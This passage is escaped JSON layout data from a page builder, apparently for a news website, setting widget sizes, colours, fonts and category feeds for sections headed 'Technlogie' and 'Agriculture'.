l_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0